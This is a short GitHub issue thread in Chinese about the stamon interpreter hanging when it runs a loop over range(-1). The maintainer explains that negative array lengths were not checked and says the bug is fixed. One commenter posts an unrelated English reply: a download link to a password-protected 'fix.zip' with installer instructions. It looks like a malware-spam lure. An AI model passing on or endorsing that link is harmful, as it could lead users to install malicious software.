### ISSUE TITLE
一些错误的代码导致stamon卡死

### ISSUE THREAD

**Issue by copi143** [CLimber-Rong/stamon#11]
我注意到在执行以下代码时stamon会卡死并且无输出

```
import std;

for i in range(-1) {
    println("Hello world!");
}
```

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by copi143** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

您好，请问这是什么

**Comment by CLimber-Rong** [comment]
感谢您的报告，该漏洞已修复！

由于虚拟机在初始化数列长度时并没有特判长度为负数的情况，所以导致了运行错误。

我们已经修复了这个问题，感谢！
